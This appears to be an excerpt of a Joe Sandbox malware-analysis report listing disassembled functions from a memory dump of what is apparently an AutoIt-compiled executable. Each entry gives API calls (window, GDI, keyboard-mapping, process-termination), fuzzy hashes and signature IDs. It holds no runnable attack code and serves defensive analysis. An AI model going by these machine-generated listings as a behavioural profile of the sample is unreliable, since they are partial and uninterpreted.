Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: fb000c84db9a98160062bebefcab2d4ccc9e77ff6f88f50a264973e0eb2d77fa
Instruction ID: faa9dd049925d9897b848ee56b9957ae109ec0a13de0a21af0e43bb27c420d62
Opcode Fuzzy Hash: fb000c84db9a98160062bebefcab2d4ccc9e77ff6f88f50a264973e0eb2d77fa
Instruction Fuzzy Hash: 7C41AC70100301AFCB21DF25CC84FAA7BE8EB45331F04066AFDA68A2A1C731D949DB71

Function 00DAE1A7 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00E01810,00000000,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE21B
EnableWindow.USER32(?,00000000), ref: 00DAE23F
ShowWindow.USER32(00E01810,00000000,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE29F
ShowWindow.USER32(?,00000004,?,?,00E01810,00E01810,?,00DBE2D6), ref: 00DAE2B1
EnableWindow.USER32(?,00000001), ref: 00DAE2D5
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00DAE2F8

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 749eb2ad4acba855e942db8a91a8173ce405c445d733d4d150ecd755e846fb0c
Instruction ID: 3e5dcfca213917014dc4bae4828b2177c06fabf6cd70333eda8c87cef167773a
Opcode Fuzzy Hash: 749eb2ad4acba855e942db8a91a8173ce405c445d733d4d150ecd755e846fb0c
Instruction Fuzzy Hash: 3C415E35641245EFEB26CF14C899F947BE5BB0B314F1C42B9FA588F2A2C731A841CB65

Function 00D91BFA Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519

Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2

_wcstok.LIBCMT ref: 00D91D6E
_wcscpy.LIBCMT ref: 00D91DFD
_memset.LIBCMT ref: 00D91E30

Strings

X, xrefs: 00D91E68

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: ee9f68f1a54a7134fe00277e8f69b75179cf05f19749a7954a3788fed63875b0
Instruction ID: f90d0bf27ecf93e5bd3c80598ff136ff82e1c7436b00ab8b01e036df5c95a371
Opcode Fuzzy Hash: ee9f68f1a54a7134fe00277e8f69b75179cf05f19749a7954a3788fed63875b0
Instruction Fuzzy Hash: 99C14C356083419FC754EF28C881A6AB7E4FF85350F04492DF99A972A2DB70ED45CBB2

Function 00DAE9C8 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00D5B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D5B5EB
Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B5FA
Part of subcall function 00D5B58B: BeginPath.GDI32(?), ref: 00D5B611
Part of subcall function 00D5B58B: SelectObject.GDI32(?,00000000), ref: 00D5B63B

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00DAE9F2
LineTo.GDI32(00000000,00000003,?), ref: 00DAEA06
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DAEA14
LineTo.GDI32(00000000,00000000,?), ref: 00DAEA24
EndPath.GDI32(00000000), ref: 00DAEA34
StrokePath.GDI32(00000000), ref: 00DAEA44

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 1e8ce1e5f762570368de079b0e7039560601c716b741ee585860848bc1ffde02
Instruction ID: 3eb95692c812ed035a52b968d9d84b98e15deb5399ab386e821499d7d02a1158
Opcode Fuzzy Hash: 1e8ce1e5f762570368de079b0e7039560601c716b741ee585860848bc1ffde02
Instruction Fuzzy Hash: 4711097600024ABFDF029F94DC88E9A7FADEB08350F048026FE0999160D7719E95DBB0

Function 00D7EF91 Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00D7EFB6
GetDeviceCaps.GDI32(00000000,00000058), ref: 00D7EFC7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D7EFCE
ReleaseDC.USER32(00000000,00000000), ref: 00D7EFD6
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00D7EFED
MulDiv.KERNEL32(000009EC,?,?), ref: 00D7EFFF

Part of subcall function 00D7A83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00D7A79D,00000000,00000000,?,00D7AB73), ref: 00D7B2CA

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: b0df4445029d4decf731b28093d63fd768f5ce5940a3fdee7755a2fca88e3984
Instruction ID: 75f9561c32d9c44e7e6ddcb9395c3dea6d83229d8761ed99ff8981a778164e85
Opcode Fuzzy Hash: b0df4445029d4decf731b28093d63fd768f5ce5940a3fdee7755a2fca88e3984
Instruction Fuzzy Hash: 8C017575A4030ABFEB109BA69C45E5EBFB9EB49351F044066F908E7380D6709C00CB71

Function 00D687D7 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00D687D7

Part of subcall function 00D61E5A: __initp_misc_winsig.LIBCMT ref: 00D61E7E
Part of subcall function 00D61E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D68BE1
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00D68BF5
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00D68C08
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00D68C1B
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00D68C2E
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00D68C41
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00D68C54
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00D68C67
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00D68C7A
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00D68C8D
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00D68CA0
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00D68CB3
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00D68CC6
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00D68CD9
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00D68CEC
Part of subcall function 00D61E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00D68CFF

__mtinitlocks.LIBCMT ref: 00D687DC

Part of subcall function 00D68AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00DFAC68,00000FA0,?,?,00D687E1,00D66AFA,00DF67D8,00000014), ref: 00D68AD1

__mtterm.LIBCMT ref: 00D687E5

Part of subcall function 00D6884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00D689CF
Part of subcall function 00D6884D: _free.LIBCMT ref: 00D689D6
Part of subcall function 00D6884D: RtlDeleteCriticalSection.NTDLL(00DFAC68), ref: 00D689F8

__calloc_crt.LIBCMT ref: 00D6880A
GetCurrentThreadId.KERNEL32 ref: 00D68833

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 71b1364a1fedab159eddbf52f38fa577cf868774280887be0dcf5e010ba2f358
Instruction ID: 4296e2019241467cefe004de0ab8065a20bd5de7f46a0bc7d19660011f89111f
Opcode Fuzzy Hash: 71b1364a1fedab159eddbf52f38fa577cf868774280887be0dcf5e010ba2f358
Instruction Fuzzy Hash: 6CF0BE731197125BE3747B7CBC0BA5A2BC0CF017B0B684B2AF468D60E2FF518841A1B5

Function 00D8A3D2 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: f1b24ef1e18652667711bf767d9db84b5a24f539c3c3f656c3379d52c3fc5c12
Instruction ID: 4dfb415dfe82a92c0264c1e6173b27af7cb634b387c561672f0eaefd3c1887f5
Opcode Fuzzy Hash: f1b24ef1e18652667711bf767d9db84b5a24f539c3c3f656c3379d52c3fc5c12
Instruction Fuzzy Hash: B6018132141313ABE7153B98ED48DEBB76AFF8A702B04053AF503D26A1DB60A801CB71

Function 00D41867 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D41898
MapVirtualKeyW.USER32(00000010,00000000), ref: 00D418A0
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D418AB
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D418B6
MapVirtualKeyW.USER32(00000011,00000000), ref: 00D418BE
MapVirtualKeyW.USER32(00000012,00000000), ref: 00D418C6

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 2e64b61eb053c4b03361b08a9b855fa6b276b49d09fe9282228c67239726a0e9
Instruction ID: c3300628d4ca685f701f0607f393b551bc380ed903a6cd5bc56096bc67a62921
Opcode Fuzzy Hash: 2e64b61eb053c4b03361b08a9b855fa6b276b49d09fe9282228c67239726a0e9
Instruction Fuzzy Hash: 7A0144B0942B5ABDE3008F6A8C85A52FEA8FF19354F04411BA15C87A42C7B5A864CBE5

Function 00D884F4 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00D88504
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00D8851A
GetWindowThreadProcessId.USER32(?,?), ref: 00D88529
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88538
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88542
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00D88549

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 94505220aa7a5fab5d7ce8684d5609048b29470ef5b33e26270cf88c30a19512
Instruction ID: f8696e6a10015c5ee088fd805a79add5ab262f6332947ee79a0456542f6f52ca
Opcode Fuzzy Hash: 94505220aa7a5fab5d7ce8684d5609048b29470ef5b33e26270cf88c30a19512
Instruction Fuzzy Hash: 6BF0BE7224035BBBE7215B629C0EEEF7E7DDFC6B11F000068FA01D1150EBA02A01D6B4

Function 00D8A31D Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00D8A330
RtlEnterCriticalSection.NTDLL(?), ref: 00D8A341
TerminateThread.KERNEL32(?,000001F6,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A34E
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D8A35B

Part of subcall function 00D89CCE: CloseHandle.KERNEL32(?,?,00D8A368,?,?,?,00DB66D3,?,?,?,?,?,00D4E681), ref: 00D89CD8

InterlockedExchange.KERNEL32(?,000001F6), ref: 00D8A36E
RtlLeaveCriticalSection.NTDLL(?), ref: 00D8A375

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 32798f671acc6f0c14f3471cf5fbe41cc2e9d62377ce61c3a10416cfa04f65f8
Instruction ID: 3abe6b176eb9857b3c049d30016cacb4c8cc4f64bc61804c7088aadd05d8c22e
Opcode Fuzzy Hash: 32798f671acc6f0c14f3471cf5fbe41cc2e9d62377ce61c3a10416cfa04f65f8
Instruction Fuzzy Hash: 3BF05E72141313ABE3112BA8ED48DEBBB7AEF89302B040532F202D12A1DBB59801CB71

Function 00D5D7C7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153

Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F

Part of subcall function 00D4BBD9: _memmove.LIBCMT ref: 00D4BC33

__swprintf.LIBCMT ref: 00D5D98F

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00D5D832

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: a98998f3c5a248ec1ae2daf54bee97c2e7adccab17101971ec5a8b8c79b87263
Instruction ID: 52fcc298090c2d6ec9f97377f09a2c4934ea676277ae3cf9b9a176e60724806e
Opcode Fuzzy Hash: a98998f3c5a248ec1ae2daf54bee97c2e7adccab17101971ec5a8b8c79b87263
Instruction Fuzzy Hash: E5915B31118241DFCB24EF24C885DAEBBA6EF95710F04491DF896972A1EB20ED48CB76

Function 00D9B482 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00D9B4A8
CharUpperBuffW.USER32(?,?), ref: 00D9B5B7
VariantClear.OLEAUT32(?), ref: 00D9B73A

Part of subcall function 00D8A6F6: VariantInit.OLEAUT32(00000000), ref: 00D8A736
Part of subcall function 00D8A6F6: VariantCopy.OLEAUT32(?,?), ref: 00D8A73F
Part of subcall function 00D8A6F6: VariantClear.OLEAUT32(?), ref: 00D8A74B

Strings

AUTOIT.ERROR, xrefs: 00D9B5BD
Incorrect Parameter format, xrefs: 00D9B4E0, 00D9B6AD

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: b4927e3fd5c81055bd9530ccf818e326ba7f2d0167f9e6d68eb6c7ea3bdd6e60
Instruction ID: 555bc47aff7ebb4b76974f7eeb9a42b8139b277eeec0ca668884ab291997a6e0
Opcode Fuzzy Hash: b4927e3fd5c81055bd9530ccf818e326ba7f2d0167f9e6d68eb6c7ea3bdd6e60
Instruction Fuzzy Hash: 12919D706083019FCB10EF24D58095ABBF5EF89710F15886EF88A8B352DB31E909CB72

Function 00D81050 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00D810B8
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00D810EE
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00D810FF
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00D81181

Strings

DllGetClassObject, xrefs: 00D810F4

Memory Dump Source

Source File: 00000003.00000002.2526287694.0000000000D41000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000003.00000002.2525966331.0000000000D40000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DEE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000DFA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E14000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2526287694.0000000000E9C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528251368.0000000000EA2000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EA3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.2528626483.0000000000EB3000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d40000_UNK_.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
